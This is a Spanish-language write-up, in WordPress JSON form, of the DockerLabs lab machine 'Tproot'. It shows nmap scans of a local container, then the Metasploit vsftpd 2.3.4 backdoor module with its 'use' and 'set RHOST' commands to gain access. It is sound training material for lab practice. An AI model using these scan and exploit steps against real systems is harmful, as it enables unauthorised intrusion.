{"id":2965,"date":"2025-06-07T10:25:54","date_gmt":"2025-06-07T10:25:54","guid":{"rendered":"https:\/\/myvlcsys.com\/?p=2965"},"modified":"2025-06-26T09:10:40","modified_gmt":"2025-06-26T09:10:40","slug":"primera-maquina-ciber-dockerlabs","status":"publish","type":"post","link":"https:\/\/myvlcsys.com\/?p=2965","title":{"rendered":"Ciber: DockerLabs [Tproot-WriteUp]"},"content":{"rendered":"\n<p>En el siguiente WriteUp vamos a resolver la m\u00e1quina de la plataforma de DockerLabs <strong>TPROOT<\/strong>, clasificada con nivel de seguridad \u201cMuy F\u00e1cil\u201d.<\/p>\n\n\n\n<p>T\u00e9cnicas aplicadas para la resoluci\u00f3n de la m\u00e1quina:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Escaneo de Puertos<\/li><li>Seachsploit<\/li><li>Metasploit<\/li><\/ul>\n\n\n\n<p><strong>Descargar la m\u00e1quina docker<\/strong><\/p>\n\n\n\n<p>megadl&nbsp; <a href=\"https:\/\/mega.nz\/file\/ORUEzLia#WQgvveTv3kAnXBs6UyRShd1JomGNg6Sk7DSa_fJwD7k\">https:\/\/mega.nz\/file\/ORUEzLia#WQgvveTv3kAnXBs6UyRShd1JomGNg6Sk7DSa_fJwD7k<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXf21_QddOr5MFk1OPXYuxjBLvYjcghBQHL_djOXfhcINM6UVq9mKFDlNPsWT4M8-Hro0ftafdjPbmrcKzTW5tEZ8jzeTX-puN0m9BuNvnKtWp0nAYZeuO18X3eQHIZbcf7k2tlMZg?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Descomprimir la m\u00e1quina:-<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>unzip tproot.zip&nbsp;<\/strong><\/li><\/ul>\n\n\n\n<p>\u250c\u2500\u2500(kali\u327fkali)-[~\/Documents\/maquinas\/tproot]<\/p>\n\n\n\n<p>\u2514\u2500$ unzip tproot.zip&nbsp;<\/p>\n\n\n\n<p>Archive:&nbsp; tproot.zip<\/p>\n\n\n\n<p>&nbsp;&nbsp;inflating: auto_deploy.sh&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;inflating: tproot.tar&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>&#8211;<\/p>\n\n\n\n<p><strong>Desplegar la m\u00e1quina:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>bash auto_deploy.sh tproot.tar<\/strong><\/li><\/ul>\n\n\n\n<p>\u250c\u2500\u2500(kali\u327fkali)-[~\/Documents\/maquinas\/tproot]<\/p>\n\n\n\n<p>\u2514\u2500$ sudo bash auto_deploy.sh tproot.tar<\/p>\n\n\n\n<p>[sudo] password for kali:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXcUDXmgxc6fwZtN5oa1F0sjSgYUA0O1jWGoewfnDCXQkDOx4Coz-B7_qeMIDVCfDD4mneY9DiMfTATK9_vpN448QVgGc5kyjh_rhzoA2guwyv3Vf5OhD1yo54XXH40ukJQOKC0YgA?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>Tras el despliegue de la m\u00e1quina ya disponemos del direccionamiento ip de la m\u00e1quina, Desde una nueva terminal comprobaremos que hacemos ping a la mv, y realizaremos un primer escaneo de puertos con nmap.<\/p>\n\n\n\n<p><strong>ESCANEO DE PUERTOS:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXd6xtq_zBppy6aaJo-Dei8ZLHyF65bKEUDOsHwJivW8RUlRKy3NMa9LMWpCixq20B2evcmLy3wWr9hNcfE_vWRL1MD6fMlaedEJQeTclxP_KOW4QVXedWPcA8q3jArOtCmBkHm0_A?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>nmap -p- &#8211;open -sS &#8211;min-rate 5000 -vvv -n -Pn 172.17.0.2<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXd70hgzDdIZzWK4vhhOZVbBMHNTf4MdhP9J4GqwD0R4BYaE7-kU71oV8smB6alGGbqHn9uaxayC5U2_YSPhzqSwPS06yCYuO9LZgPZ7j3NWiCJxyUH0mvtgsawI3-Q8nc_FMZU7LA?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>nmap -sCV -p 21,80 172.17.0.2<br><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXdMUNg-qEc6enZ_enVR6SLZ5btkBXGQTdoguyUaBEVUeL115japdSsfnIXDPHVHnuLLysydd6Kdkqw9AnQm0O_-GbzKMyRHfwSoZGHf1DJgOChxYNGpkbepUFhhxCvq3ZAKMtqhlw?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>AN\u00c1LISIS DEL ESCANEO DE PUERTOS:<\/strong><\/p>\n\n\n\n<p>Tras el an\u00e1lisis observamos que la mv objetivo, tiene activos los servicios de ftp y apache2.<\/p>\n\n\n\n<p>Exploramos el mediante el navegador web, que web nos encontramos alojada en el servidor.<\/p>\n\n\n\n<p>En lo referido al servicio de vsftpd, observamos que se trata de la versi\u00f3n 2.3.4, est\u00e1 versi\u00f3n puede ser vulnerable a un exploit de metaexploit, vamos a investigar s\u00ed por aqu\u00ed la vm puede ser vulnerable.<\/p>\n\n\n\n<p><strong>ESCALADA DE PRIVILEGIOS.<\/strong><\/p>\n\n\n\n<p><strong>METAEXPLOIT:<\/strong><\/p>\n\n\n\n<p>msfconsole -q<\/p>\n\n\n\n<p>Ahora debemos buscar el exploit para el servicio a vulnerar en nuestro caso vsftpd 2.3.4<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXe5PcTUMS-6louh6evn3Txwd5Lw7oYFPl7ZTv9caCiKYkv61L8OnIuS9QaUpdkz85QN6b9g8V1BlsZhOXLgbRre3PefTMB-BEEZBGM_ojZp7r8UA0n8rz5poFdmc-9hkxlP6bXlqw?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>Indicamos el exploit a usar con \u201cuse\u201d y configuramos el exploit con los par\u00e1metros que nos solicita, en este caso indicaremos la ip de la mv v\u00edctima con \u201cset RHOST IP\u201d :<\/p>\n\n\n\n<p><strong>use exploit\/unix\/ftp\/vsftpd_234_backdoor<\/strong><\/p>\n\n\n\n<p><strong>set RHOST 172.17.0.2<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXfvTAXRowWzOR98V5OFGhouHdwfZlm6u9QGvAZeQlFCn85xWd7Z_13Rak_JYph7kYONdIlY5MWHp8nGOyAHgagfl3LSQzYkUnb0UtlEcwxbvllbMEEj7T83_ENJ3-Jeph54dVbh-A?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXetQ9deKMYYSu7avY9E7nnmNxNn-QVp9BhpfZ5aaBNOfLsgN6omMgYwqVkyjkfzxDQ8OnQsCVodVfkxKB3sQ--0JrwUP88ubSIg6VoJFXQ80cqYwtUagEDA5oQXqTkwNHSx-sKFgw?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>As\u00ed pues daremos por finalizada la intrusi\u00f3n en la m\u00e1quina.<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En el siguiente WriteUp vamos a resolver la m\u00e1quina de la plataforma de DockerLabs TPROOT, clasificada con nivel de seguridad \u201cMuy F\u00e1cil\u201d. T\u00e9cnicas aplicadas para la resoluci\u00f3n de la m\u00e1quina:&hellip; <\/p>\n","protected":false},"author":4,"featured_media":2974,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[60,74,10],"tags":[61,47],"class_list":["post-2965","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ciberseguridad","category-dockerlabs","category-linux","tag-ciberseguridad","tag-myvlcsys"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/posts\/2965","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2965"}],"version-history":[{"count":7,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/posts\/2965\/revisions"}],"predecessor-version":[{"id":3030,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/posts\/2965\/revisions\/3030"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/media\/2974"}],"wp:attachment":[{"href":"https:\/\/myvlcsys.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2965"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2965"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2965"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}